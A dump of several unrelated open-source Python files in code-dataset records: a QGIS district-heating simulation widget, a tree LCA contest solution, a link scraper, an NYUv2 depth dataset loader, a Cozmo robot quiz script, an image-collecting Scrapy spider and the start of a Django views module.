5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ECO_2.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ECO_2.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ECO_2.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_3.setItem(5, 3, cellr)\n self.tableWidget_3.setItem(5, 4, cellt)\n 
self.tableWidget_3.setItem(5, 5, cell)\n\n print(\"KPIs done!\")\n self.stop_progress_bar.emit()\n\n\n def set_up_simulator(self):\n self.simulator = DistrictSimulator()\n self.simulator.DHN_network_list = self.DHN_network_list\n self.simulator.DCN_network_list = self.DCN_network_list\n\n self.simulator.sources_tab = self.baseline_sources_table\n self.simulator.ef_sources_tab = self.baseline_sources_table\n print(\"Step2_dockwidget.set_up_simulator: self.baseline_sources_table, self.simulator.sources_tab, self.simulator.ef_sources_tab\",\n self.baseline_sources_table, self.simulator.sources_tab, self.simulator.ef_sources_tab)\n self.simulator.sources = self.sources\n self.simulator.step1_network_tree_widget = self.step1.dmmTreeNetwork\n self.simulator.step1_building_tree_widget = self.step1.dmmTree\n self.simulator.step0_district_sources_tab = self.step0.sources_available\n self.simulator.step4_network_tree_widget = None\n self.simulator.step4_building_tree_widget = None\n\n self.simulator.logger = self.logger\n\n self.simulator.baseline_scenario = self.baseline_scenario\n self.simulator.future_scenario = None\n\n self.simulator.baseline_KPIs = None\n self.simulator.KPIs_additional_data = self.step1.KPIs_additional_data\n\n self.simulator.heat = self.heat\n self.simulator.temperature = self.temperature\n\n self.simulator.set_up_new_simulation()\n\n def get_area(self, building_id):\n expr = QgsExpression(\"BuildingID=\" + building_id)\n if self.baseline_scenario is None:\n\n return\n fs = [ft for ft in self.baseline_scenario.getFeatures(QgsFeatureRequest(expr))]\n if len(fs) > 0:\n feature_0 = fs[0]\n else:\n return 0\n return feature_0.geometry().area()\n\n def sum_file(self, file, column=0, separator=\";\"):\n total = 0.0\n try:\n with open(file) as fp:\n for i, line in enumerate(fp):\n total = total + float(line.split(separator)[column])\n except:\n print(\"file\", file, \"column\", column, \"separator\", separator)\n return 0.0\n return total\n\n def get_source_infos(self, widget, source):\n for i in range(widget.rowCount()):\n if widget.verticalHeaderItem(i).text() == source:\n try:\n return [float(widget.item(i, 0).text()),\n float(widget.item(i, 1).text())]\n except:\n print(\"Step2_dockwidget.py, get_source_infos: impossible to get row\", i)\n return [0, 0]\n\n def remove_files(self, dr, start):\n if not os.path.isdir(dr):\n return\n for f in os.listdir(dr):\n fn = os.fsdecode(f)\n if fn.startswith(start):\n os.remove(os.path.join(dr, fn))\n\n\n def set_up_logger(self):\n class Printer:\n def write(self, x):\n print(x)\n\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.INFO)\n\n output_stream = sys.stdout if sys.stdout is not None else Printer()\n stream_handler = logging.StreamHandler(output_stream)\n formatter = logging.Formatter('%(asctime)s :: %(levelname)s :: %(message)s')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(logging.DEBUG)\n self.logger.addHandler(stream_handler)\n\n def reset_tech_info_to_0(self, tech_info=None):\n if tech_info is None:\n tech_info = self.create_base_tech_infos()\n tech_info = self.reset_tech_info_to_0(tech_info=tech_info)\n return tech_info\n else:\n for key in tech_info.keys():\n tech_info[key] = 0\n return tech_info\n\n def receive_widget(self, widget, sources, dhn, dcn):\n self.baseline_buildings_widget = widget\n self.baseline_sources_table = sources\n self.DHN_network_list = dhn\n self.DCN_network_list = dcn\n print(\"Step2.py, receive_widget(). 
DHN and DCN\", [n.name for n in self.DHN_network_list],\n [n.name for n in self.DCN_network_list])\n print(\"Step2.py, receive_widget(). widget, sources:\", widget, sources)\n\n def receive_baseline_scenario(self, layer):\n self.baseline_scenario = layer\n\n def get_step0_data(self, heat, temperature):\n self.heat = heat\n self.temperature = temperature\n\n def round_to_string(self, in_value):\n try:\n return str(round(float(in_value), 2))\n except:\n return \"Nan\"\n\n","repo_name":"Planheat/Planheat-Tool","sub_path":"planning_and_simulation_modules/Step2_docwidget.py","file_name":"Step2_docwidget.py","file_ext":"py","file_size_in_byte":29840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31650135128","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\n# doubling\nclass LCA():\n def __init__(self, links, root):\n self.n = len(links)\n self.dbl = [[-1] for _ in range(self.n)]\n self.depth = [-1] * self.n\n self.depth[root] = 0\n self.order = []\n stack = [root]\n while stack:\n i = stack.pop()\n self.order.append(i)\n for j in links[i]:\n if self.depth[j] != -1:\n continue\n self.depth[j] = self.depth[i] + 1\n self.dbl[j][0] = i\n stack.append(j)\n \n self.log_d = (max(self.depth)).bit_length()\n for j in range(self.log_d - 1):\n for i in range(self.n):\n ancestor = self.dbl[i][j]\n self.dbl[i].append(self.dbl[ancestor][j])\n \n def lca(self, x, y):\n assert (self.depth[x] >= 0) and (self.depth[y] >= 0)\n if(self.depth[x] < self.depth[y]):\n x,y = y,x\n dif = self.depth[x] - self.depth[y]\n for bi in range(self.log_d):\n if(dif >> bi)&1:\n x = self.dbl[x][bi]\n \n if(x == y):\n return x\n for bi in range(self.log_d-1, -1, -1):\n if(self.dbl[x][bi] != self.dbl[y][bi]):\n x = self.dbl[x][bi]\n y = self.dbl[y][bi]\n return self.dbl[x][0]\n\nimport sys\nread = sys.stdin.buffer.read\n\nn,*data = map(int,read().split())\nab = data[:2*(n-1)]\nq = data[2*(n-1)]\nkv = data[2*(n-1)+1:]\n\nlinks = [[] for _ in range(n)]\nit = iter(ab)\nfor a,b in zip(it,it):\n a -= 1\n b -= 1\n links[a].append(b)\n links[b].append(a)\n\nlca = LCA(links, 0)\nsort_num = [0] * n\nfor i,oi in enumerate(lca.order):\n sort_num[oi] = i\n\nans = []\nidx = 0\nfor _ in range(q):\n k = kv[idx]\n v = [i-1 for i in kv[idx+1:idx+1+k]]\n idx += 1+k\n\n v.sort(key=lambda x: sort_num[x])\n \n tmp = 0\n for i in range(k):\n x = v[i-1]\n y = v[i]\n lca_xy = lca.lca(x,y)\n tmp += lca.depth[x] + lca.depth[y] - lca.depth[lca_xy] * 2\n \n tmp //= 2\n ans.append(tmp)\n\nprint('\\n'.join(map(str,ans)))\n\n\n\n","repo_name":"komajun365/competitive_programming","sub_path":"others/typical90/035/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74316447206","text":"import shelve\n\nimport wc\nfrom bs4 import BeautifulSoup as BS\nimport requests\n\n\nchecks = [\n wc.is_instapaper,\n wc.is_tw_action,\n wc.is_unsubscribe,\n]\n\nwith shelve.open('wc.db', writeback=True) as db:\n if 'rich_links' not in db:\n db['rich_links'] = {}\n\n for link in db['links'] :\n if not any(check(link) for 
check in checks):\n resp = requests.get(link)\n soup = BS(resp.text, 'html.parser')\n db['rich_links'][link] = {\n 'url': link,\n 'title': soup.title.text,\n }\n db.sync()\n","repo_name":"abele/weekly-compressor","sub_path":"addmeta.py","file_name":"addmeta.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6162430861","text":"from pathlib import Path\r\nimport json\r\nfrom network_utils import gradient\r\nimport numpy as np\r\nimport torch\r\nfrom torch.utils.data import Dataset\r\nfrom torchvision.transforms import InterpolationMode\r\nfrom PIL import Image\r\nfrom .utils import downsample, bicubic_with_mask, random_crop, random_rotate, random_horizontal_flip\r\n\r\n\r\nclass NYUv2Dataset256(Dataset):\r\n\r\n def __init__(\r\n self,\r\n root='/home/qiaoxin/prj/Qiao/dataset/NYUDepthv2',\r\n crop_size=(256, 256),\r\n do_horizontal_flip=True,\r\n max_rotation_angle=0,\r\n rotation_interpolation=InterpolationMode.BILINEAR,\r\n image_transform=None,\r\n depth_transform=None,\r\n in_memory=False,\r\n split='test',\r\n crop_valid=True,\r\n crop_deterministic=True,\r\n scaling=8,\r\n **kwargs\r\n ):\r\n self.crop_size = crop_size\r\n self.do_horizontal_flip = do_horizontal_flip\r\n self.max_rotation_angle = max_rotation_angle\r\n self.rotation_interpolation = rotation_interpolation\r\n self.image_transform = image_transform\r\n self.depth_transform = depth_transform\r\n self.crop_valid = crop_valid\r\n self.crop_deterministic = crop_deterministic\r\n self.scaling = scaling\r\n\r\n import h5py\r\n file = h5py.File(Path(root) / 'nyu_depth_v2_labeled.mat')\r\n\r\n with open(Path(root) / 'split_idc.json') as fh:\r\n self.split_idc = np.array(json.load(fh)[split])\r\n\r\n if max_rotation_angle > 0 and crop_deterministic:\r\n raise ValueError('Max rotation angle has to be zero when cropping deterministically')\r\n\r\n self.images = np.array(file['images']) if in_memory else file['images']\r\n self.depth_maps = np.array(file['depths']) if in_memory else file['depths']\r\n self.instances = np.array(file['instances']) if in_memory else file['instances']\r\n self.labels = np.array(file['labels']) if in_memory else file['labels']\r\n\r\n self.W, self.H = self.images.shape[2:]\r\n\r\n # if self.crop_valid:\r\n # if self.max_rotation_angle > 45:\r\n # raise ValueError('When crop_valid=True, only rotation angles up to 45° are supported for now')\r\n #\r\n # # make sure that max rotation angle is valid, else decrease\r\n # max_angle = np.floor(min(\r\n # 2 * np.arctan((np.sqrt(-(crop_size[0] ** 2) + self.H ** 2 + self.W ** 2) - self.W) / (crop_size[0] + self.H)),\r\n # 2 * np.arctan((np.sqrt(-(crop_size[1] ** 2) + self.W ** 2 + self.H ** 2) - self.H) / (crop_size[1] + self.W))\r\n # ) * (180. 
/ np.pi))\r\n        #\r\n        #     if self.max_rotation_angle > max_angle:\r\n        #         print(f'Max rotation angle too large for given image size and crop size, decreased to {max_angle}')\r\n        #         self.max_rotation_angle = max_angle\r\n\r\n    def __getitem__(self, index):\r\n        if self.crop_deterministic:\r\n            num_crops_h, num_crops_w = self.H // self.crop_size[0], self.W // self.crop_size[1]\r\n            im_index = self.split_idc[index // (num_crops_h * num_crops_w)]\r\n        else:\r\n            im_index = self.split_idc[index]\r\n\r\n        image = self.images[im_index].astype('float32').T\r\n        depth_map = self.depth_maps[im_index].astype('float32').T\r\n        instances = self.instances[im_index].astype('int16').T\r\n        labels = self.labels[im_index].astype('int16').T\r\n        image, depth_map, instances, labels = image.copy(), depth_map.copy(), instances.copy(), labels.copy()\r\n\r\n        outputs = [image, depth_map, instances, labels]\r\n\r\n        # if self.do_horizontal_flip and not self.crop_deterministic:\r\n        #     outputs = random_horizontal_flip(outputs)\r\n        #\r\n        # if self.max_rotation_angle > 0 and not self.crop_deterministic:\r\n        #     outputs = random_rotate(outputs, self.max_rotation_angle, self.rotation_interpolation,\r\n        #                             crop_valid=self.crop_valid)\r\n        #     # passing fill=np.nan to rotate sets all pixels to nan, so set it here explicitly\r\n        #     outputs[1][outputs[1] == 0.] = np.nan\r\n\r\n        if self.crop_deterministic:\r\n            crop_index = index % (num_crops_h * num_crops_w)\r\n            crop_index_h, crop_index_w = crop_index // num_crops_w, crop_index % num_crops_w\r\n            slice_h = slice(crop_index_h * self.crop_size[0], (crop_index_h + 1) * self.crop_size[0])\r\n            slice_w = slice(crop_index_w * self.crop_size[1], (crop_index_w + 1) * self.crop_size[1])\r\n            outputs = [o[slice_h, slice_w] for o in outputs]\r\n        else:\r\n            outputs = random_crop(outputs, self.crop_size)\r\n\r\n        # # apply user transforms\r\n        # if self.image_transform is not None:\r\n        #     outputs[0] = self.image_transform(outputs[0])\r\n        # if self.depth_transform is not None:\r\n        #     outputs[1] = self.depth_transform(outputs[1])\r\n\r\n        image = outputs[0]\r\n        depth_map = outputs[1]\r\n        # print('depth_map:', depth_map.shape)\r\n\r\n        h, w = image.shape[:2]\r\n        # source = downsample(depth_map.unsqueeze(0), self.scaling).squeeze().unsqueeze(0)\r\n        source = np.array(Image.fromarray(depth_map).resize((w//self.scaling, h//self.scaling), Image.BICUBIC)) # bicubic, RMSE=7.13\r\n\r\n        # gradient map\r\n        depth_grad = gradient(depth_map)\r\n\r\n        # normalize\r\n        depth_min = np.nanmin(depth_map)\r\n        depth_max = np.nanmax(depth_map)\r\n        depth_map = (depth_map - depth_min) / (depth_max - depth_min) # torch.Size([1, 256, 256])\r\n        source = (source - depth_min) / (depth_max - depth_min)\r\n        depth_grad = depth_grad / (depth_max - depth_min)\r\n\r\n        image = image.astype(np.float32).transpose(2, 0, 1) / 255\r\n        image = (image - np.array([0.485, 0.456, 0.406]).reshape(3,1,1)) / np.array([0.229, 0.224, 0.225]).reshape(3,1,1)\r\n\r\n        y_bicubic = np.array(Image.fromarray(source).resize((w, h), Image.BICUBIC))\r\n\r\n        source = torch.from_numpy(source).unsqueeze(0).float()\r\n        y_bicubic = torch.from_numpy(y_bicubic).unsqueeze(0).float()\r\n        image = torch.from_numpy(image).float()\r\n        depth_map = torch.from_numpy(depth_map).unsqueeze(0).float()\r\n        depth_grad = torch.from_numpy(depth_grad).unsqueeze(0).float()\r\n\r\n        mask_hr = (~torch.isnan(depth_map)).float()\r\n        mask_lr = (~torch.isnan(source)).float()\r\n        mask_grad = (~torch.isnan(depth_grad)).float()\r\n        mask_hr = (mask_hr*mask_grad) # torch.Size([1, 256, 256])\r\n\r\n        depth_map[mask_hr == 0.] 
= 0.\r\n        depth_grad[mask_hr == 0.] = 0.\r\n        source[mask_lr == 0.] = 0.\r\n\r\n        return {'image': image, 'hr': depth_map, 'mask_hr': mask_hr, 'mask_lr': mask_lr, 'idx': index,\r\n                'lr': y_bicubic, 'grad': depth_grad, 'max': depth_max * 100, 'min': depth_min * 100}\r\n\r\n    def __len__(self):\r\n        if self.crop_deterministic:\r\n            return len(self.split_idc) * (self.H // self.crop_size[0]) * (self.W // self.crop_size[1])\r\n        return len(self.split_idc)\r\n","repo_name":"wudiqx106/DSR-EI","sub_path":"datasets/nyu256.py","file_name":"nyu256.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72472763367","text":"from attrs import define, field\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass MaskedAR:\n    def __init__(self):\n        self.xent = nn.CrossEntropyLoss(reduction=\"none\")\n\n    def train_and_metrics(self, batch, logits):\n        return (\n            (self.xent(logits.permute(0, 2, 1), batch.targets) * batch.mask).mean(),\n            {},\n        )\n\n\n@define(slots=False)\nclass PolicyValue:\n    v_weight: float = 1.0\n    policy_weight: float = 1.0\n\n    def loss_and_metrics(self, batch, logits):\n        v_logits = logits[\"values\"]\n        m_logits = logits[\"moves\"]\n\n        v_error = F.mse_loss(v_logits, batch.values)\n\n        metrics = {\n            \"v_error\": v_error.item(),\n        }\n\n        moves = batch.moves\n        if moves.ndim == 1:\n            with torch.no_grad():\n                argmax = torch.argmax(m_logits, dim=-1)\n                match = argmax == moves\n            metrics[\"acc@01\"] = match.float().mean().item()\n\n        return (\n            self.v_weight * v_error\n            + self.policy_weight * F.cross_entropy(m_logits, moves)\n        ), metrics\n","repo_name":"nelhage/taktician","sub_path":"python/tak/model/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"53"} +{"seq_id":"33425626591","text":"'''\nIf the gcd of w and h is 1, the diagonal cuts w+h-1 boxes;\notherwise it cuts w+h-gcd(w, h) boxes.\n'''\ndef solution(w,h):\n    lst = []\n    if w == h: return w*h-w\n    elif w == 1 or h == 1: return 0\n\n    for i in range(1,w+1):\n        if w%i == 0: lst.append(i)\n    for i in range(1,h+1):\n        if h%i == 0: lst.append(i)\n\n    for i in sorted(lst,reverse=True):\n        if lst.count(i) == 2 and i>1:\n            return (w*h)-(w+h-i)\n        elif lst.count(i) == 2 and i==1:\n            return (w*h)-(w+h-1)\n\nw, h = map(int,input().split())\nprint(solution(w,h))","repo_name":"Jihyeon0712/Programmers","sub_path":"2단계/Python_Code/2. 멀쩡한 사각형.py","file_name":"2. 
멀쩡한 사각형.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38273845935","text":"import time\r\nimport asyncio\r\nimport xmltodict\r\nimport cozmo\r\nimport urllib.request\r\nimport urllib.parse\r\nfrom cozmo.objects import LightCube1Id, LightCube2Id, LightCube3Id\r\nfrom PIL import Image, ImageDraw, ImageFont\r\n\r\ndef retreive_student_questions(email, password):\r\n data = {}\r\n data[\"email\"] = email\r\n data[\"password\"] = password\r\n data[\"request\"] = \"chooseQuestion\"\r\n url_values = urllib.parse.urlencode(data)\r\n url = \"http://localhost:9000/cozmo\"\r\n full_url = url + \"?\" + url_values\r\n page = urllib.request.urlopen(full_url)\r\n data_dict = xmltodict.parse(page.read())\r\n\r\n structured_questions = {}\r\n \r\n for result in data_dict[\"sparql\"][\"results\"][\"result\"]:\r\n current_course = \"\"\r\n current_understanding = \"\"\r\n current_question = \"\"\r\n current_possible_answer = \"\"\r\n current_correct_answer = \"\"\r\n for binding in result[\"binding\"]:\r\n if(binding[\"@name\"] == \"courseLabel\"):\r\n current_course = binding[\"literal\"]\r\n if(binding[\"@name\"] == \"understanding\"):\r\n current_understanding = binding[\"literal\"]\r\n if(binding[\"@name\"] == \"question\"):\r\n current_question = binding[\"literal\"][\"#text\"]\r\n if(binding[\"@name\"] == \"possibleAnswer\"):\r\n current_possible_answer = binding[\"literal\"][\"#text\"]\r\n if(binding[\"@name\"] == \"correctAnswer\"):\r\n current_correct_answer = binding[\"literal\"][\"#text\"]\r\n\r\n #print(\"\\n\", current_course, \"\\n\", current_understanding, \"\\n\", current_question[\"#text\"], \"\\n\", current_possible_answer[\"#text\"], \"\\n\", current_correct_answer[\"#text\"])\r\n\r\n if((current_course, current_understanding) not in structured_questions):\r\n structured_questions[(current_course, current_understanding)] = {}\r\n \r\n if(current_question not in structured_questions[(current_course, current_understanding)]):\r\n structured_questions[(current_course, current_understanding)][current_question] = {}\r\n \r\n structured_questions[(current_course, current_understanding)][current_question][current_possible_answer] = False\r\n\r\n structured_questions[(current_course, current_understanding)][current_question][current_correct_answer] = True\r\n\r\n return structured_questions\r\n\r\ndef construct_cozmo_quiz(robot, structured_quiz_data, isRandomized):\r\n chosen_course = (\"\", \"11000\")\r\n chosen_question = \"\"\r\n chosen_incorrect_answers = list()\r\n chosen_correct_answer = \"\"\r\n\r\n for key in structured_quiz_data:\r\n if(int(key[1]) < int(chosen_course[1])):\r\n chosen_course = (key[0], key[1])\r\n\r\n if(chosen_course in structured_quiz_data):\r\n for question in structured_quiz_data[chosen_course]:\r\n if(chosen_question == \"\"):\r\n chosen_question = question\r\n\r\n for answer in structured_quiz_data[chosen_course][chosen_question]:\r\n if(structured_quiz_data[chosen_course][chosen_question][answer]):\r\n chosen_correct_answer = answer\r\n else:\r\n chosen_incorrect_answers.append(answer)\r\n\r\n print(chosen_correct_answer)\r\n print(chosen_incorrect_answers)\r\n cozmo_ask_quiz_question_demo(robot, chosen_question, chosen_correct_answer, chosen_incorrect_answers[0], chosen_incorrect_answers[1])\r\n\r\ndef cozmo_lights(robot: cozmo.robot.Robot):\r\n cube1 = robot.world.get_light_cube(LightCube1Id) # looks like a paperclip\r\n cube2 = 
robot.world.get_light_cube(LightCube2Id) # looks like a lamp / heart\r\n cube3 = robot.world.get_light_cube(LightCube3Id) # looks like the letters 'ab' over 'T'\r\n\r\n if cube1 is not None:\r\n cube1.set_lights(cozmo.lights.red_light)\r\n else:\r\n cozmo.logger.warning(\"Cozmo is not connected to a LightCube1Id cube - check the battery.\")\r\n\r\n if cube2 is not None:\r\n cube2.set_lights(cozmo.lights.green_light)\r\n else:\r\n cozmo.logger.warning(\"Cozmo is not connected to a LightCube2Id cube - check the battery.\")\r\n\r\n if cube3 is not None:\r\n cube3.set_lights(cozmo.lights.blue_light)\r\n else:\r\n cozmo.logger.warning(\"Cozmo is not connected to a LightCube3Id cube - check the battery.\")\r\n\r\n # Keep the lights on for 10 seconds until the program exits\r\n time.sleep(10)\r\n\r\ndef make_text_image(text_to_draw, x, y, font=None):\r\n '''Make a PIL.Image with the given text printed on it\r\n\r\n Args:\r\n text_to_draw (string): the text to draw to the image\r\n x (int): x pixel location\r\n y (int): y pixel location\r\n font (PIL.ImageFont): the font to use\r\n\r\n Returns:\r\n :class:(`PIL.Image.Image`): a PIL image with the text drawn on it\r\n '''\r\n\r\n # make a blank image for the text, initialized to opaque black\r\n text_image = Image.new('RGBA', cozmo.oled_face.dimensions(), (0, 0, 0, 255))\r\n\r\n # get a drawing context\r\n dc = ImageDraw.Draw(text_image)\r\n\r\n # draw the text\r\n dc.text((x, y), text_to_draw, fill=(255, 255, 255, 255), font=font)\r\n\r\n return text_image\r\n\r\ndef text_to_face(robot, text):\r\n text_image = make_text_image(text, 0, 0, ImageFont.truetype(\"arial.ttf\", 35))\r\n oled_face_data = cozmo.oled_face.convert_image_to_screen_data(text_image)\r\n return robot.display_oled_face_image(oled_face_data, 1000, in_parallel=True)\r\n\r\ndef cozmo_correct_answer_response(robot: cozmo.robot.Robot):\r\n action1 = robot.play_anim_trigger(cozmo.anim.Triggers.BuildPyramidThirdBlockUpright, in_parallel=True)\r\n \r\n cube1 = robot.world.get_light_cube(LightCube1Id) # looks like a paperclip\r\n cube2 = robot.world.get_light_cube(LightCube2Id) # looks like a lamp / heart\r\n cube3 = robot.world.get_light_cube(LightCube3Id) # looks like the letters 'ab' over 'T'\r\n\r\n cube1.set_lights(cozmo.lights.green_light)\r\n cube2.set_lights(cozmo.lights.green_light)\r\n cube3.set_lights(cozmo.lights.green_light)\r\n\r\n time.sleep(0.1)\r\n\r\n cube1.set_lights(cozmo.lights.off_light)\r\n cube2.set_lights(cozmo.lights.off_light)\r\n cube3.set_lights(cozmo.lights.off_light)\r\n\r\n time.sleep(0.1)\r\n\r\n cube1.set_lights(cozmo.lights.green_light)\r\n cube2.set_lights(cozmo.lights.green_light)\r\n cube3.set_lights(cozmo.lights.green_light)\r\n\r\n time.sleep(0.1)\r\n\r\n action1.wait_for_completed()\r\n\r\n robot.say_text(\"Kor Rect\", voice_pitch=0.6).wait_for_completed()\r\n\r\ndef cozmo_incorrect_answer_response(robot: cozmo.robot.Robot):\r\n action1 = robot.play_anim_trigger(cozmo.anim.Triggers.MajorFail, in_parallel=True)\r\n \r\n cube1 = robot.world.get_light_cube(LightCube1Id) # looks like a paperclip\r\n cube2 = robot.world.get_light_cube(LightCube2Id) # looks like a lamp / heart\r\n cube3 = robot.world.get_light_cube(LightCube3Id) # looks like the letters 'ab' over 'T'\r\n\r\n cube1.set_lights(cozmo.lights.red_light)\r\n cube2.set_lights(cozmo.lights.red_light)\r\n cube3.set_lights(cozmo.lights.red_light)\r\n\r\n time.sleep(0.1)\r\n\r\n cube1.set_lights(cozmo.lights.off_light)\r\n cube2.set_lights(cozmo.lights.off_light)\r\n 
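# all three cubes are briefly switched off between the two red flashes\r\n    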
cube3.set_lights(cozmo.lights.off_light)\r\n\r\n    time.sleep(0.1)\r\n\r\n    cube1.set_lights(cozmo.lights.red_light)\r\n    cube2.set_lights(cozmo.lights.red_light)\r\n    cube3.set_lights(cozmo.lights.red_light)\r\n\r\n    time.sleep(0.1)\r\n\r\n    action1.wait_for_completed()\r\n\r\n    robot.say_text(\"Try a gain\", voice_pitch=0.8).wait_for_completed()\r\n\r\ndef cozmo_ask_quiz_question_demo(robot: cozmo.robot.Robot, question, correct_answer, incorrect_answer_1, incorrect_answer_2):\r\n    cube1 = robot.world.get_light_cube(LightCube1Id) # looks like a paperclip\r\n    cube2 = robot.world.get_light_cube(LightCube2Id) # looks like a lamp / heart\r\n    cube3 = robot.world.get_light_cube(LightCube3Id) # looks like the letters 'ab' over 'T'\r\n\r\n    Cubes = [cube1, cube2, cube3]\r\n\r\n    robot.say_text(question, voice_pitch=0.8).wait_for_completed()\r\n\r\n    robot.say_text(\"Is it\", voice_pitch=0.8).wait_for_completed()\r\n    answer1_action_1 = robot.say_text(incorrect_answer_1, voice_pitch=0.8, in_parallel=True)\r\n    answer1_action_2 = text_to_face(robot, incorrect_answer_1)\r\n    cube1.set_lights(cozmo.lights.blue_light)\r\n    answer1_action_1.wait_for_completed()\r\n    answer1_action_2.wait_for_completed()\r\n    cube1.set_lights(cozmo.lights.off_light)\r\n\r\n    robot.say_text(\"Is it\", voice_pitch=0.8).wait_for_completed()\r\n    answer2_action_1 = robot.say_text(correct_answer, voice_pitch=0.8, in_parallel=True)\r\n    answer2_action_2 = text_to_face(robot, correct_answer)\r\n    cube2.set_lights(cozmo.lights.blue_light)\r\n    answer2_action_1.wait_for_completed()\r\n    answer2_action_2.wait_for_completed()\r\n    cube2.set_lights(cozmo.lights.off_light)\r\n\r\n    robot.say_text(\"Or is it\", voice_pitch=0.8).wait_for_completed()\r\n    answer3_action_1 = robot.say_text(incorrect_answer_2, voice_pitch=0.8, in_parallel=True)\r\n    answer3_action_2 = text_to_face(robot, incorrect_answer_2)\r\n    cube3.set_lights(cozmo.lights.blue_light)\r\n    answer3_action_1.wait_for_completed()\r\n    answer3_action_2.wait_for_completed()\r\n    cube3.set_lights(cozmo.lights.off_light)\r\n\r\n    last_cube1_tap = cube1.last_tapped_robot_timestamp\r\n    last_cube2_tap = cube2.last_tapped_robot_timestamp\r\n    last_cube3_tap = cube3.last_tapped_robot_timestamp\r\n\r\n    while(not (cube1.last_tapped_robot_timestamp != last_cube1_tap or cube2.last_tapped_robot_timestamp != last_cube2_tap or cube3.last_tapped_robot_timestamp != last_cube3_tap)):\r\n        time.sleep(0.0001)\r\n\r\n    # respond only for the cube whose tap timestamp actually changed\r\n    last_taps = [last_cube1_tap, last_cube2_tap, last_cube3_tap]\r\n    for cube, last_tap in zip(Cubes, last_taps):\r\n        if(cube.last_tapped_robot_timestamp != last_tap):\r\n            if(cube == cube2):\r\n                cozmo_correct_answer_response(robot)\r\n            else:\r\n                cozmo_incorrect_answer_response(robot)\r\n\r\ndef begin_demo(robot: cozmo.robot.Robot):\r\n    data = retreive_student_questions(\"johndoe2020@gmail.com\", \"passpass\")\r\n    construct_cozmo_quiz(robot, data, False)\r\n\r\ncozmo.run_program(begin_demo)\r\n","repo_name":"angelson1992/TippaDemo","sub_path":"CozmoManager.py","file_name":"CozmoManager.py","file_ext":"py","file_size_in_byte":9929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"545377368","text":"import scrapy\nfrom ..items import FaceItem, GameInfo\n\nclass GameUrlSpider(scrapy.Spider):\n    name = 'gameurl'\n\n    def start_requests(self):\n        url = 'file:///Users/siskon/Desktop/2013SQL.html'\n        yield scrapy.Request(url=url, callback=self.parse_table)\n\n    def parse_table(self, response):\n        rows = response.css('#query_result_main tr')[1:5]\n        for row in rows:\n            print('Collecting game: ', row.xpath('td[2]/text()').get())\n            url = row.xpath('td[4]/text()').get()\n            
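# column 4 holds the target page URL; rows without one are skipped below\n            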
print(url)\n if url is not None:\n yield scrapy.Request(url = 'http://' + url + '&gc=gc', \n meta = GameInfo(name=row.xpath('td[1]/text()').get()),\n callback = self.collect_image)\n \n def collect_image(self, response):\n srcs = response.css('table a+img::attr(src)').getall()\n srcs = [response.urljoin(src) for src in srcs]\n for src in srcs:\n print(src)\n yield FaceItem(image_urls=srcs, meta=response.meta,\n name=response.url.split('=')[-1])","repo_name":"SiskonEmilia/Anime-Wifu-Dataset","sub_path":"spider/dataset/spiders/gameurl_spider.py","file_name":"gameurl_spider.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"5596153648","text":"# s1 = {(3,3),[[0,1,0],[0,1,0],[1,1,1]]}\n\n'''\ntable size 6x8\n\n\n**blocks**\nb0 : 1x1\no\n\nb1 : 3x3\nxox\nxox\nooo\n\nb2 : 3x3\nxox\nooo\nxox\n\nb3 : 3x3\noxx\noox\nxoo\n\nb4 : 3x2\noo\nox\nox\n\nb5 : 2x4\nooxx\nxooo\n\nb6 : 2x4\noooo\nxoxx\n\nb7 : 2x3\nxxo\nooo\n\nb8 : 3x3\nxox\nooo\nxxo\n\nb9 :5x1\no\no\no\no\no\n\nb10 : 3x2\noo\nxo\nxo\n\n\n'''\n\nsize = (3,3)\nfor i in range(6):\n if i + size[0] > 6:\n continue\n for j in range(8):\n if j+size[1] > 8:\n continue\n print(i,j)\n","repo_name":"nomadlife/python-exercise","sub_path":"puzzle_solver_test.py","file_name":"puzzle_solver_test.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"ta","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11484281130","text":"import requests\nimport json\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.core.urlresolvers import reverse_lazy, reverse\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import permission_required\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom apps.movies.models import Movie, UserMovie\nfrom django.utils.decorators import method_decorator\nfrom hakloevno import settings\nfrom apps.movies.forms import MovieForm\n# Create your views 